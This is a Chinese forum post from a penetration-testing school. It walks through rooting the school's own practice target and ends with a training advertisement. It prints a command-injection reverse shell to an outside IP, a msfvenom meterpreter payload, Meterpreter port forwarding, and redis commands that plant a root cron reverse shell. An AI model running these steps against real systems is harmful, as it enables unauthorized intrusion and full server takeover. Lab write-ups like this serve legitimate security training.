找回密码
 立即注册

扫一扫,访问微社区

QQ登录

只需一步,快速开始

搜索

必火教育渗透测试靶机提权实验-必火入侵了自己的服务器

nvhack 2019-11-29 10:10:40 显示全部楼层 阅读模式
0x01:目标是一个开放的靶机站,支持sql注入,XSS,文件上传,代码执行,命令执行等
截图201911290150305004..png

0x02:其中命令执行处,可以执行代码

截图201911290152435288..png

0x03:既然这样,那就反弹一个shell吧
远程服务器nc监听一下吧
  1. nc -l -v -n -p 666
复制代码
截图201911290156576300..png

0x04:rce命令执行处,执行
  1. 127.0.0.1 | bash -i >& /dev/tcp/211.149.143.91/666 0>&1
复制代码
截图201911290200488008..png

得到shell,查看自己的权限,查看系统版本,查看端口信息


继续查看具体版本

  1. cat /etc/*-release
复制代码

截图201911290311143593..png

0x05:内核提权走一波

截图201911290313219645..png
尝试无果之后,继续查看其它思路

0x06: 发现redis一枚

  1. ps -fu root | grep redis
复制代码
截图201911290318057414..png
redis 默认使用的是6379端口,但是并没有对外开放,所以可以先把这个端口转发出来,可以使用metasploit工具进行端口转发
截图201911290321594208..png

1,首先生成一个反弹shell的控制端,代码如下:
  1. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=211.149.143.91  LPORT=888   -f elf > bihuo.cn.elf
复制代码

2,然后把这个shell.elf 上传到目标网站上,需要上传到可写目录,所以进入/tmp目录查看一下
截图201911290342055469..png

给可执行权限:
截图201911290400156911..png

使用metasploit 监听888端口,反弹shell
截图201911290402242437..png

目标站点执行./shell.elf
截图201911290417101319..png

成功拿到meterpreter
截图201911290418086278..png

截图201911290419397658..png

0x07,接下来把6379转发过来
  1. portfwd add -l 999 -p 6379 -r 127.0.0.1
  2. # -l 监听本地999端口,
  3. #-p 远程的目标端口
  4. # 意思是把目标的6379端口转发到本地999端口,999是你自己的服务器端口,这样你就可以随便操作了
复制代码

截图201911290424309573..png

接下来使用nmap探测redis是否存在漏洞
  1. nmap -A -p 999 -script redis-info 127.0.0.1
复制代码
因为我们已经做了端口转发,所以这个999,实际是目标站的6379端口,127.0.0.1实际上是目标的ip
截图201911290430239950..png
可以看到Redis的版本和服务器上内核版本信息,如果是新版的Redis2.8以后的版本还可以看到Redis配置文件的绝对路径
既然999我们可以连接,那么我们就连接上,默认口令是空,我们下载一个redis2.86版本到我们的服务器上,解压后执行
截图201911290435476295..png

接下来我们使用redis匿名访问漏洞写入反弹shell,我们再开启一个nc,监听555端口,把这个反弹shell直接转发到555端口即可
  1. set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/211.149.143.91/555 0>&1\n\n"

  2. config set dir /var/spool/cron

  3. config set dbfilename root
复制代码
截图201911290504077342..png

截图201911290509321059..png

0x08:总结一下:
1,我们首先通过rce反弹一个普通的shell,端口用的是666
2,我们又使用metasploit 生成被控端反弹meterpreter 用的端口是888

2,把redis 转发到本地端口进行连接  ,端口用的是999

3,利用redis,写一个反弹shell,本地监听的的端口是555,因为redis是基于root权限运行的,所以写的反弹shell就是最高权限,至此,提权完毕



截图201911290203288391..png
必火网络安全培训,北京实地培训,月月有开班,零基础入门,四个月打造渗透高手。
详情请加微信:18622800700,手机微信同号。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

  • 0 关注
  • 2 粉丝
  • 140 帖子